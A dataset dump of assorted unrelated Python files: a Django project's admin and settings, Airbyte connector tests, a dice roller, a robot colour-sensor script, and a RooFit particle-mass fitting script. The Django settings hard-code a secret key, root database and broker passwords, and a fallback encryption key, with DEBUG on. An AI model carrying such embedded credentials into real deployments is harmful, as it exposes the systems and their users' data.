text stringlengths 38 1.54M |
|---|
import sys
if __name__ == '__main__':
print "Usage:", sys.argv[0], " [input] [output] [known? (y/n)]"
output = open(sys.argv[2], 'w')
if sys.argv[3] == "y": # known (source & train)
with open(sys.argv[1], 'r') as file:
line = file.readline()
while line:
l = line.split()
output.write("%s %s:1 %d:1\n" % (l[2], l[0], int(l[1]) + 50000))
line = file.readline()
else: # unknown (test)
with open(sys.argv[1], 'r') as file:
line = file.readline()
while line:
l = line.split()
output.write("0 %s:1 %d:1\n" % (l[0], int(l[1]) + 50000))
line = file.readline()
|
from django.contrib import admin
from . import models
admin.site.register((models.Category, models.CarAd, models.Owner, models.Offer))
|
from searchEngine.models import WordFromIndexedPage, IndexedPage
from collections import defaultdict
import utilities.tselogging as logging
from utilities.util import bulk_save
logger = logging.getLogger("tse.se.example")
# Example executions.
# Say "google" is an already saved WordFromIndexedPage Instance, and we
# get these words from nltk clean html
list_of_words = ["new", "google", "googl3", "google4"]
# Database queries (eg, save(), get, filter) etc do disk-IO op,
# hence are slower than mem access,
# we could cache stuffs, and batch save all objects at the end :)
# with a function like:
cache = {} # word<String> : wordL<WordFromIndexedPage>
cacheWordLocation = defaultdict(list)
# it's ok, we do this just once...-ish
url = IndexedPage.objects.get(pk="http://www.google.com")
for word in list_of_words:
if word not in cache:
cache[word] = WordFromIndexedPage(indexedPage=url, word=word)
cacheWordLocation[word].append(32)
for key in cache.keys():
cache[key].set_offsets(cacheWordLocation[key])
# DO NOT SAVE() each time ;)
all_models_to_save = cache.values()
# you might not wanna forget this dude. question: why mush URL be the
# *last model*?
all_models_to_save.append(url)
bulk_save(all_models_to_save)
raw_input("Inspect database (F5=refresh),\
then press enter to undo this example's effects are removed")
for update in cache.values():
update.delete()
WordFromIndexedPage(
indexed_page=url,
word="google",
offsets_in_indexedPage=str(
[1])).save()
|
from itertools import *
from random import *
'''
Returns a list of lists of what num number of numbers that sum up to summation
'''
def sum_list_memo(summation, num):
answer = []
if (num <= 0):
return []
if (num == 1 and summation >= 10) or (summation < 0):
return []
if (num == 1 and summation < 10 and summation >= 0):
return [[summation]]
else:
for i in range(10):
a = sum_list_memo(summation - i, num - 1)
for j in a:
print(j)
j.append(i)
answer.append(j)
return answer
def sum_list_memo_2(summation, num, r):
if r[summation][num]:
return r[summation][num]
else:
answer = []
if (num <= 0):
r[summation][num] = []
if (num == 1 and summation >= 10) or (summation < 0):
r[summation][num] = []
if (num == 1 and summation < 10 and summation >= 0):
r[summation][num] = [[summation]]
else:
for i in range(10):
a = None
if (summation - i < 0) or num == 0:
a = []
else:
a = sum_list_memo_2(summation - i, num - 1, r)
# print(a)
for j in a:
k = list(j)
k.append(i)
answer.append(k)
r[summation][num] = answer
return r[summation][num]
def sum_list(summation, num):
r = [[None for i in range(num + 1)] for j in range(summation + 1)]
# print(r)
return sum_list_memo_2(summation,num,r)
def random_index():
a = [i for i in range(80)]
ans = []
for i in range(32):
k = randint(0, len(a) - 1)
ans.append(a[k])
a.remove(a[k])
return ans
def random_list():
ans = []
a = [i for i in range(10)]
while a:
print(a)
k = randint(0,len(a) - 1)
ans.append(a[k])
print(k)
print(a[k])
a.remove(a[k])
return ans
# a = sum_list(10,8)
print(random_list())
# b = sum_list_memo(2,3)
# print(a)
# print(b) |
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
from airbyte_cdk.logger import AirbyteLogger
from airbyte_cdk.models import (
AirbyteStream,
ConfiguredAirbyteCatalog,
ConfiguredAirbyteStream,
ConnectorSpecification,
DestinationSyncMode,
SyncMode,
)
from source_instagram.source import SourceInstagram
logger = AirbyteLogger()
def test_check_connection_ok(api, some_config):
ok, error_msg = SourceInstagram().check_connection(logger, config=some_config)
assert ok
assert not error_msg
def test_check_connection_empty_config(api):
config = {}
ok, error_msg = SourceInstagram().check_connection(logger, config=config)
assert not ok
assert error_msg
def test_check_connection_invalid_config(api, some_config):
some_config.pop("start_date")
ok, error_msg = SourceInstagram().check_connection(logger, config=some_config)
assert not ok
assert error_msg
def test_check_connection_exception(api, config):
api.side_effect = RuntimeError("Something went wrong!")
ok, error_msg = SourceInstagram().check_connection(logger, config=config)
assert not ok
assert error_msg
def test_streams(api, config):
streams = SourceInstagram().streams(config)
assert len(streams) == 7
def test_spec():
spec = SourceInstagram().spec()
assert isinstance(spec, ConnectorSpecification)
def test_read(config):
source = SourceInstagram()
catalog = ConfiguredAirbyteCatalog(
streams=[
ConfiguredAirbyteStream(
stream=AirbyteStream(name="users", json_schema={}, supported_sync_modes=[SyncMode.full_refresh]),
sync_mode=SyncMode.full_refresh,
destination_sync_mode=DestinationSyncMode.overwrite,
)
]
)
assert source.read(logger, config, catalog)
|
import random
if __name__ == "__main__":
print('Dice Roller')
print('''Enter what kind and how many dice to roll. The format is the number of dice, followed by "d",
followed by the number of sides the dice have. You can also add a plus or minus adjustment.
Examples:
3d6 rolls three 6-sided dice
1d10+2 rolls one 10-sided die, and adds 2
2d38-1 rolls two 38-sided die, and subtracts 1
QUIT quits the program
''')
while True:
while True:
userInput = input('> ').lower()
if 'd' in userInput or userInput == 'quit':
break
print('Invalid input.')
if userInput == 'quit':
print('Thanks for playing!')
break
numOfRolls, userInput = userInput.split('d')
numOfRolls = int(numOfRolls)
try:
if '+' in userInput:
numOfSide, bonusPoint = list(map(int, userInput.split('+')))
elif '-' in userInput:
numOfSide, bonusPoint = list(map(int, userInput.split('-')))
bonusPoint *= -1
else:
numOfSide = int(userInput)
bonusPoint = 0
except ValueError:
print('Invalid input. Enter something like "3d6" or "1d10+2".')
continue
diceRolls = [random.randint(1, numOfSide) for _ in range(numOfRolls)]
totalValue = sum(diceRolls) + bonusPoint
print(totalValue, end=' ')
print('(', end='')
print(', '.join(map(str, diceRolls)), end='')
if bonusPoint != 0:
print(f', +{bonusPoint}' if bonusPoint >
0 else f', {bonusPoint}', end='')
print(')')
|
#!/usr/bin/env python
import os
from camstrument_client import CamstrumentClient
CAMERA = os.getenv('CAMERA', 0)
IP = os.getenv('IP', '127.0.0.1')
PORT = os.getenv('PORT', 10001)
GRID_COUNT = os.getenv('GRID_COUNT', 8)
THRESHOLD = os.getenv('THRESHOLD', 20)
DEBUG = os.getenv('DEBUG', 'False') == 'True'
def main():
c = CamstrumentClient(CAMERA, IP, PORT, GRID_COUNT, THRESHOLD, DEBUG)
c.run()
if __name__ == '__main__':
main()
|
"""
Django settings for setting project.
Generated by 'django-admin startproject' using Django 2.0.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'tk*gi)vg#&9ogg!oco$7_2r7zt)*(h-$oj-0hwkj$%s38!7gk@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_extensions',
'rest_framework',
'qdiff',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'setting.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'setting.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'qdiff',
'USER': 'root',
"PASSWORD": 'root',
'HOST': 'localhost',
'PORT': '3306',
'OPTIONS': {
'init_command': 'SET sql_mode=\'STRICT_TRANS_TABLES\'',
},
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, "static/")
# logging
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': "[%(asctime)s] %(levelname)s "
"[%(name)s:%(lineno)s] %(message)s",
'datefmt': "%d/%b/%Y %H:%M:%S"
},
},
'handlers': {
'logfile': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': os.path.join(BASE_DIR, 'dev.log'),
'formatter': 'standard',
},
# 'console': {
# 'level': 'INFO',
# 'class': 'logging.StreamHandler',
# 'formatter': 'standard'
# },
},
'loggers': {
'django': {
'handlers': ['logfile'],
'propagate': True,
'level': 'WARN',
},
# 'django.db.backends': {
# 'handlers': ['logfile'],
# 'level': 'DEBUG',
# 'propagate': False,
# },
}
}
# qDiff
GENERATED_TABLE_PREFIX = 'GEN'
CONFLICT_TABLE_NAME_FORMAT = '{prefix}_TASK_{id}_{position}'
DEFAULT_DATA_LENGTH = 80
SOURCE_TYPE_DATABASE_PREFIX = 'database:'
SOURCE_TYPE_CSV_PREFIX = 'csv:'
SOURCE_TYPE_PREFIXES = [
SOURCE_TYPE_DATABASE_PREFIX, SOURCE_TYPE_CSV_PREFIX]
SOURCE_REQUIRED_FIELDS = ['ENGINE', 'NAME']
SCHEMA_INFER_LIMIT = 300
SCHEMA_INFER_CONFIDENCE = 1.00
SCHEMA_CSV_MISSING_VALUES = ['', 'None', 'null', None, 'NULL']
SCHEMA_DATABASE_MISSING_VALUES = ['', 'None', 'null', None, 'NULL']
RESULT_SPLITTING_TOKEN = '<@#$>'
FILE_UPLOAD_FOLDER = 'data'
REPORT_FILENAME_FORMAT = 'TASK_{task_id}_{report_type}'
REPORT_FOLDER = 'gen_reports'
TEMP_FOLDER = 'tmp'
# qDiff report
# if field based difference of given field is over this number
# the rest will not be save into report object
REPORT_MAX_DIFF_PAIR = 80
# CELERY
CELERY_BROKER_URL = 'amqp://guest:guest@localhost//'
#: Only add pickle to this list if your broker is secured
#: from unwanted access (see userguide/security.html)
CELERY_ACCEPT_CONTENT = ['json']
CELERY_RESULT_BACKEND = 'db+sqlite:///results.sqlite'
CELERY_TASK_SERIALIZER = 'json'
# DRF
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
]
}
# Key for encryption configs
FILE_ENCRYPTION_KEY = os.environ.get(
'FIELD_ENCRYPTION_KEY',
b'rUbndCP4bma9IgiunLeNzwO2mKQVCjjPr-qAQXHf__E=')
|
import pandas as pd
import os
finalres=[]
print
print "KDD Cup"
print "-------"
os.chdir('2016KDDCupSelected')
execfile('gen_results.py')
finalres.append((homogcount,mainlyhomogcount,randomhomogcount,randommainlyhomogcount))
print
print "Sustainable Energy"
print "------------------"
os.chdir('../SustainableEnergy')
execfile('gen_results.py')
finalres.append((homogcount,mainlyhomogcount,randomhomogcount,randommainlyhomogcount))
print
print "Mechanical Engineering"
print "-----------------------"
os.chdir('../MechanicalEngineering')
execfile('gen_results.py')
finalres.append((homogcount,mainlyhomogcount,randomhomogcount,randommainlyhomogcount))
print
print "Cardiology"
print "-----------------------"
os.chdir('../Cardiology')
execfile('gen_results.py')
finalres.append((homogcount,mainlyhomogcount,randomhomogcount,randommainlyhomogcount))
os.chdir('..')
finalres=pd.DataFrame(finalres)
finalres.columns=['#Homogeneous','#Mainly-Homogeneous','#Randomized homogeneous','#Randomized mostly homogeneous']
finalres.index=['KDD','Sustainable Energy','Mechanical Engineering','Cardiology']
|
# VEX IQ Python-Project
import sys
import vexiq
#region config
motor_1 = vexiq.Motor(1)
color_2 = vexiq.ColorSensor(2) # hue
#endregion config
red = (48,40,44,128)
blue = (11,27,130,137)
color_2.led_on()
print("reading")
sys.sleep(3)
initial = color_2.raw_color()
print("initial:", initial)
def close(color):
measurement = color_2.raw_color()
thresholds = (20,25,50,25)
for i in range(4):
diff = abs(color[i] - measurement[i])
if diff > thresholds[i]:
#print(measurement, diff, thresholds[i])
#sys.sleep(1)
return False
print("hit!", measurement)
return True
print("watching...")
while True:
if close(blue):
motor_1.run(100, 100, True)
sys.sleep(1)
motor_1.run(-10, 100, True)
sys.sleep(2)
if close(red):
motor_1.run(-100, 100, True)
sys.sleep(1)
motor_1.run(10, 100, True)
sys.sleep(2)
|
#!/usr/bin/env python3
import sys
sums = {}
for line in sys.stdin:
parts = line.strip().split()
num = int(parts[-1])
name = ' '.join(parts[:-1])
if name not in sums:
sums[name] = 0
sums[name] += num
for name in sums:
print(name, sums[name])
|
How to run the file?
1.Download the fresh_tomatoes file and save this file with an extension .py.
2.Then download the media file and save this file also with an extension .py.
3.Type the code required for movie trailer and save
this file as entertainment_center with an extension .py.
4.Open the Open the entertainment_center.py with IDLE.
5.Run the file.
6.The browser will open and you could see the web page running in it.
This is a website created using python.
The home page will show list of Movie names. When we click on the movie,
the trailor of the particular movie will start playing in a popup.
|
import argparse
parser = argparse.ArgumentParser(description="")
# parser.add_argument("inputfile" , help = "Path to the input ROOT file")
parser.add_argument("dimusel" , help = "Define if keep or remove dimuon resonances. You can choose: keepPsiP, keepJpsi, rejectPsi, keepPsi")
parser.add_argument("year" , help = "choose among:2016,2017,2018", default = '2018')
args = parser.parse_args()
'''
code to fit the B0 mass distribution:
- unbinned fit
- possibility to apply cuts on the dimuon mass [B0&Psi cut in RunI analysis] (e.g. to exclude the Jpsi mass region, or the psi) via the parameter dimusel
'''
import os, sys, inspect
from os import path
sys.path.insert(0, os.environ['HOME'] + '/.local/lib/python2.7/site-packages')
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0,parentdir)
import ROOT
from ROOT import gSystem
ROOT.gROOT.SetBatch(True)
gSystem.Load('libRooFit')
gSystem.Load('../utils/func_roofit/libRooDoubleCBFast')
from ROOT import RooFit, RooRealVar, RooDataSet, RooArgList, RooTreeData, RooArgSet, RooAddPdf, RooFormulaVar
from ROOT import RooGaussian, RooExponential, RooChebychev, RooProdPdf, RooCBShape, TFile, RooPolynomial
import sys, math, pdb
from uncertainties import ufloat
ROOT.RooMsgService.instance().setGlobalKillBelow(4)
ROOT.Math.MinimizerOptions.SetDefaultMaxFunctionCalls(50000)
def _getFittedVar(varName, w=None):
if w is not None:
return ufloat (w.var(varName).getVal() , w.var(varName).getError())
else :
return ufloat (varName.getVal() , varName.getError())
def _goodFit(r):
return (r.status()==0 and r.covQual() == 3)
def _accFit(r):
return (r.status()==4 and r.covQual() == 3)
def _writeFitStatus(r):
str_status = "GOOD" if r.status()==0 else "NOT CONV"
txt = ROOT.TLatex(.16,.7, "fit status: " + str_status + ", covQ = %s" %r.covQual() )
txt . SetNDC() ;
txt . SetTextSize(0.033) ;
txt . SetTextFont(42)
return txt
def _writeChi2(chi2):
txt = ROOT.TLatex(.16,.8, "fit #chi^{2}: %.1f "%chi2 )
txt . SetNDC() ;
txt . SetTextSize(0.033) ;
txt . SetTextFont(42)
return txt
def _constrainVar(var, nsigma):
constr = _getFittedVar(var.GetName(), w)
gauss_constr = RooGaussian( "c_%s" %var.GetName() ,
"c_%s" %var.GetName() ,
var ,
ROOT.RooFit.RooConst( constr.n ),
ROOT.RooFit.RooConst( nsigma*constr.s )
)
print 'constraining var', var.GetName(), ': ', constr.n , ' with uncertainty ' , nsigma*constr.s
return gauss_constr
sys.path.append("../utils")
from utils.utils import *
from utils.fit_functions import *
nbins = 60
nSigma_psiRej = 3.
cut_base = applyB0PsiCut(args.dimusel, nSigma_psiRej)
## uncertainty on fRT
frt_sigma = frt_sigmas[args.year]
q2binning = [
1,
2,
4.3,
6,
8.68,
10.09,
12.86,
14.18,
16,
# 19,
]
from collections import OrderedDict
fitStats = OrderedDict()
covStats = OrderedDict()
chi2s = OrderedDict()
def fitData(fulldata, ibin, w):
cut = cut_base + '&& (mumuMass*mumuMass > %s && mumuMass*mumuMass < %s)'%(q2binning[ibin], q2binning[ibin+1])
data = fulldata.reduce(RooArgSet(tagged_mass,mumuMass,mumuMassE), cut)
nrt_mc = _getFittedVar("nRT_%s"%ibin, w)
nwt_mc = _getFittedVar("nWT_%s"%ibin, w)
fraction = nrt_mc / (nrt_mc + nwt_mc)
print 'mistag fraction on MC for bin ', ibin , ' : ' , fraction.n , '+/-', fraction.s
### creating RT component
w.loadSnapshot("reference_fit_RT_%s"%ibin)
mean_rt = w.var("mean^{RT%s}"%ibin)
sigma_rt1 = w.var("#sigma_{RT1}^{%s}"%ibin)
sigma_rt2 = RooRealVar()
alpha_rt1 = RooRealVar()
alpha_rt2 = RooRealVar()
n_rt1 = RooRealVar()
n_rt2 = RooRealVar()
f1rt = RooRealVar()
## double cb fast
if ibin < 4:
alpha_rt1 = w.var("#alpha_{RT1}^{%s}"%ibin)
alpha_rt2 = w.var("#alpha_{RT2}^{%s}"%ibin)
n_rt1 = w.var("n_{RT1}^{%s}"%ibin)
n_rt2 = w.var("n_{RT2}^{%s}"%ibin)
## double cb old
else:
sigma_rt2 = w.var("#sigma_{RT2}^{%s}"%ibin)
alpha_rt1 = w.var("#alpha_{RT1}^{%s}"%ibin)
alpha_rt2 = w.var("#alpha_{RT2}^{%s}"%ibin)
n_rt1 = w.var("n_{RT1}^{%s}"%ibin)
n_rt2 = w.var("n_{RT2}^{%s}"%ibin)
f1rt = w.var("f^{RT%s}"%ibin)
theRTgauss = w.pdf("doublecb_RT%s"%ibin)
### creating WT component
w.loadSnapshot("reference_fit_WT_%s"%ibin)
mean_wt = w.var("mean_{WT}^{%s}"%ibin)
sigma_wt = w.var("#sigma_{WT1}^{%s}"%ibin)
alpha_wt1 = w.var("#alpha_{WT1}^{%s}"%ibin)
alpha_wt2 = w.var("#alpha_{WT2}^{%s}"%ibin)
n_wt1 = w.var("n_{WT1}^{%s}"%ibin)
n_wt2 = w.var("n_{WT2}^{%s}"%ibin)
theWTgauss = w.pdf("doublecb_%s"%ibin)
### creating variable for the difference between the two peaks
deltaPeaks = RooFormulaVar("deltaPeaks%s"%ibin, "@0 - @1", RooArgList(mean_rt, mean_wt))
frt = RooRealVar ("F_{RT}%s"%ibin , "frt" , fraction.n , 0, 1)
signalFunction = RooAddPdf ("sumgaus%s"%ibin , "rt+wt" , RooArgList(theRTgauss,theWTgauss), RooArgList(frt))
### now create background parametrization
slope = RooRealVar ("slope_%s"%ibin , "slope" , 0.5, -10, 10);
bkg_exp = RooExponential("bkg_exp%s"%ibin , "exponential" , slope, tagged_mass );
pol_c1 = RooRealVar ("p1_%s"%ibin , "coeff x^0 term" , 0.5, -10, 10);
pol_c2 = RooRealVar ("p2_%s"%ibin , "coeff x^1 term" , 0.5, -10, 10);
bkg_pol = RooPolynomial ("bkg_pol%s"%ibin , "2nd order pol" , tagged_mass, RooArgList(pol_c1, pol_c2));
fsig = RooRealVar("fsig%s"%ibin , "fsig" , 0.9, 0, 1);
# nsig = RooRealVar("Yield%s"%ibin , "signal frac" , 1000, 0, 10000);
# nbkg = RooRealVar("nbkg%s"%ibin , "bkg fraction" , 1000, 0, 500000);
nsig = RooRealVar("Yield" , "signal frac" , 600000, 0, 5000000);
nbkg = RooRealVar("nbkg" , "bkg fraction" , 100000, 0, 2000000);
# if ibin==4:
# nsig.setRange(500000,1500000)
# nsig.setVal(900000)
# nbkg.setRange(80000,1000000)
# nbkg.setVal(100000)
### creating constraints
c_vars = RooArgSet()
c_pdfs = RooArgSet()
c_sigma_rt1 = _constrainVar(sigma_rt1, 1)
c_alpha_rt1 = _constrainVar(alpha_rt1, 1)
c_alpha_rt2 = _constrainVar(alpha_rt2, 1)
c_n_rt1 = _constrainVar(n_rt1, 1)
c_n_rt2 = _constrainVar(n_rt2, 1)
c_sigma_wt = _constrainVar(sigma_wt, 1)
c_alpha_wt1 = _constrainVar(alpha_wt1, 1)
c_alpha_wt2 = _constrainVar(alpha_wt2, 1)
c_n_wt1 = _constrainVar(n_wt1, 1)
c_n_wt2 = _constrainVar(n_wt2, 1)
if ibin < 4:
c_pdfs = RooArgSet(c_sigma_rt1, c_alpha_rt1, c_alpha_rt2, c_n_rt1, c_n_rt2)
c_vars = RooArgSet(sigma_rt1, alpha_rt1, alpha_rt2, n_rt1, n_rt2)
else:
c_sigma_rt2 = _constrainVar(sigma_rt2, 1)
c_pdfs = RooArgSet(c_sigma_rt1, c_sigma_rt2, c_alpha_rt1, c_alpha_rt2, c_n_rt1, c_n_rt2)
c_vars = RooArgSet( sigma_rt1, sigma_rt2, alpha_rt1, alpha_rt2, n_rt1, n_rt2)
c_pdfs.add(c_sigma_wt); c_vars.add(sigma_wt)
c_pdfs.add(c_alpha_wt1); c_vars.add(alpha_wt1)
c_pdfs.add(c_alpha_wt2); c_vars.add(alpha_wt2)
c_pdfs.add(c_n_wt1); c_vars.add(n_wt1)
c_pdfs.add(c_n_wt2); c_vars.add(n_wt2)
c_deltaPeaks = RooGaussian("c_deltaPeaks%s"%ibin , "c_deltaPeaks", deltaPeaks, ROOT.RooFit.RooConst( deltaPeaks.getVal() ),
ROOT.RooFit.RooConst( 0.0005 ) ## value to be checked
)
c_pdfs.add(c_deltaPeaks)
c_vars.add(deltaPeaks)
c_frt = RooGaussian("c_frt%s"%ibin , "c_frt" , frt, ROOT.RooFit.RooConst(fraction.n) , ROOT.RooFit.RooConst(frt_sigma[ibin]) )
c_pdfs.add(c_frt)
c_vars.add(frt)
constr_list = RooArgList(c_pdfs)
constr_list.add(signalFunction)
c_signalFunction = RooProdPdf ("c_signalFunction", "c_signalFunction", constr_list)
# mean = RooRealVar ("mass" , "mean" , B0Mass_, 3, 7, "GeV")
# sigma = RooRealVar ("#sigma_{1}" , "sigma" , 0.028, 0, 10, "GeV")
# signalGauss = RooGaussian("signalGauss" , "signal gauss" , tagged_mass, mean,sigma)
#
# sigma2 = RooRealVar ("#sigma_{2}" , "sigma2" , 0.048, 0, 0.07, "GeV")
# signalGauss2 = RooGaussian("signalGauss2" , "signal gauss2" , tagged_mass, mean,sigma2)
# f1 = RooRealVar ("f1" , "f1" , 0.8 , 0., 1.)
# gaus = RooAddPdf ("gaus" , "gaus1+gaus2" , RooArgList(signalGauss,signalGauss2), RooArgList(f1))
# pol_c1 = RooRealVar ("p1" , "coeff x^0 term", 0.5, -10, 10);
# pol_c2 = RooRealVar ("p2" , "coeff x^1 term", 0.5, -10, 10);
# pol_c3 = RooRealVar ("p3" , "coeff x^2 term", 0.5, -10, 10);
# slope = RooRealVar ("slope" , "slope" , 0.5, -10, 10);
# bkg_exp = RooExponential("bkg_exp" , "exponential" , slope, tagged_mass );
# bkg_pol = RooChebychev("bkg_pol" , "2nd order pol" , tagged_mass, RooArgList(pol_c1,pol_c2));
fitFunction = RooAddPdf ("fitfunction%s"%ibin , "fit function" , RooArgList(c_signalFunction, bkg_exp), RooArgList(nsig, nbkg))
# r = fitFunction.fitTo(data,
# # RooFit.Extended(True),
# RooFit.Range("full"),
# ROOT.RooFit.Constrain(c_vars),
# ROOT.RooFit.Minimizer("Minuit2","migrad"),
# ROOT.RooFit.Hesse(True),
# ROOT.RooFit.Strategy(2),
# ROOT.RooFit.Minos(False),
# )
print 'fit with Hesse strategy 2 done, now Minos'
r = fitFunction.fitTo(data,
RooFit.Extended(True),
RooFit.Save(),
RooFit.Range("full"),
RooFit.Verbose(False),
ROOT.RooFit.Constrain(c_vars),
# ROOT.RooFit.Minimizer("Minuit2","migrad"),
# ROOT.RooFit.Hesse(True),
# ROOT.RooFit.Strategy(2),
# ROOT.RooFit.Minos(False),
)
r.Print()
r.correlationMatrix().Print()
fitStats['data%s'%(ibin)] = r.status()
covStats['data%s'%(ibin)] = r.covQual()
frame = tagged_mass.frame( RooFit.Range("full") )
data.plotOn(frame, RooFit.Binning(nbins), RooFit.MarkerSize(.7))
fitFunction.plotOn(frame, RooFit.NormRange("full"), RooFit.Range("full"))
## evaluate sort of chi2 and save number of RT/WT events
observables = RooArgSet(tagged_mass)
flparams = fitFunction.getParameters(observables)
nparam = int(flparams.selectByAttrib("Constant",ROOT.kFALSE).getSize())
pdfstring = "fitfunction%s_Norm[tagged_mass]_Range[full]_NormRange[full]"%ibin
chi2s['data%s'%ibin] = frame.chiSquare(pdfstring, "h_fulldata", nparam)
frame. addObject(_writeChi2( chi2s['data%s'%ibin] ))
drawPdfComponents(fitFunction, frame, ROOT.kAzure, RooFit.NormRange("full"), RooFit.Range("full"), isData = True)
# fitFunction.paramOn(frame, RooFit.Layout(0.62,0.86,0.89))
parList = RooArgSet (nsig, mean_rt, sigma_rt, alpha_rt1, alpha_rt2, n_rt1, n_rt2, mean_wt, sigma_wt)
# parList.add(alphawt1)
# parList.add(alphawt2)
# parList.add(nwt1)
# parList.add(nwt2)
parList.add(frt)
fitFunction.paramOn(frame, RooFit.Parameters(parList), RooFit.Layout(0.62,0.86,0.89))
frame.Draw()
niceFrame(frame, '')
frame. addObject(_writeFitStatus(r))
c1 = ROOT.TCanvas()
upperPad = ROOT.TPad('upperPad' , 'upperPad' , 0., 0.35 , 1., 1. )
lowerPad = ROOT.TPad('lowerPad' , 'lowerPad' , 0., 0.0 , 1., 0.345 )
upperPad.SetBottomMargin(0.012)
lowerPad.SetTopMargin(0)
lowerPad.SetBottomMargin(0.2)
upperPad.Draw(); lowerPad.Draw()
upperPad.cd()
frame.Draw()
if not args.year=='test': writeCMS(frame, args.year, [ q2binning[ibin], q2binning[ibin+1] ], 0)
frame.Draw()
## add plot of pulls
lowerPad.cd()
hpull = frame.pullHist("h_fulldata", pdfstring)
frame2 = tagged_mass.frame(RooFit.Range("full"), RooFit.Title(''))
frame2.addPlotable(hpull,"P")
niceFrameLowerPad(frame2, 'pull')
frame2.Draw()
line = ROOT.TLine(5.0,1,5.6,1)
line.SetLineColor(ROOT.kGreen+3)
line.Draw()
for ilog in [True,False]:
upperPad.SetLogy(ilog)
c1.SaveAs('fit_results_mass/save_fit_data_%s_%s_LMNR_Update%s_newSigmaFRT_pars_Jpsi.pdf'%(ibin, args.year, '_logScale'*ilog))
out_f.cd()
r.Write('results_data_%s'%(ibin))
params = fitFunction.getParameters(RooArgSet(tagged_mass))
out_w.saveSnapshot("reference_fit_data_%s"%(ibin),params,ROOT.kTRUE)
getattr(out_w, 'import')(fitFunction)
# getattr(out_w, 'import')(signalFunction)
# getattr(out_w, 'import')(bkg_pol)
tData = ROOT.TChain('ntuple')
if args.year == 'test':
tData.Add('/gwteray/users/fiorendi/final_ntuples_p5prime_allyears/2016Data_100k.root')
else:
tData.Add('/gwteray/users/fiorendi/final_ntuples_p5prime_allyears/%sData_All_finalSelection.root'%args.year)
tagged_mass = RooRealVar("tagged_mass" , "#mu^{+}#mu^{-}K#pi mass", 5., 5.6, "GeV")
mumuMass = RooRealVar("mumuMass" , "mumuMass" , 0, 6);
mumuMassE = RooRealVar("mumuMassE" , "mumuMassE", 0, 10000);
tagB0 = RooRealVar("tagB0" , "tagB0" , 0, 2);
tagged_mass.setRange("full", 5.0,5.6) ;
thevars = RooArgSet()
thevars.add(tagged_mass)
thevars.add(mumuMass)
thevars.add(mumuMassE)
thevars.add(tagB0)
fulldata = RooDataSet('fulldata', 'fulldataset', tData, RooArgSet(thevars))
## add to the input tree the combination of the variables, to be used for the cuts on the dimuon mass
deltaB0Mfunc = RooFormulaVar("deltaB0M", "deltaB0M", "@0 - @1", RooArgList(tagged_mass,B0Mass) )
deltaJMfunc = RooFormulaVar("deltaJpsiM" , "deltaJpsiM" , "@0 - @1", RooArgList(mumuMass,JPsiMass) )
deltaPMfunc = RooFormulaVar("deltaPsiPM" , "deltaPsiPM" , "@0 - @1", RooArgList(mumuMass,PsiPMass) )
deltaB0M = fulldata.addColumn(deltaB0Mfunc) ;
deltaJpsiM = fulldata.addColumn(deltaJMfunc) ;
deltaPsiPM = fulldata.addColumn(deltaPMfunc) ;
thevars.add(deltaB0M)
thevars.add(deltaJpsiM)
thevars.add(deltaPsiPM)
if args.year == 'test':
fname_mcresults = 'fit_results_mass_checkOnMC/results_fits_2016_newSigmaFRT_Jpsi.root'
else:
fname_mcresults = 'fit_results_mass_checkOnMC/results_fits_%s_newSigmaFRT_Jpsi.root'%args.year
fo = ROOT.TFile()
try:
fo = ROOT.TFile(fname_mcresults,'open')
except:
print ('file %s or not found'%(fo))
w = fo.Get('w')
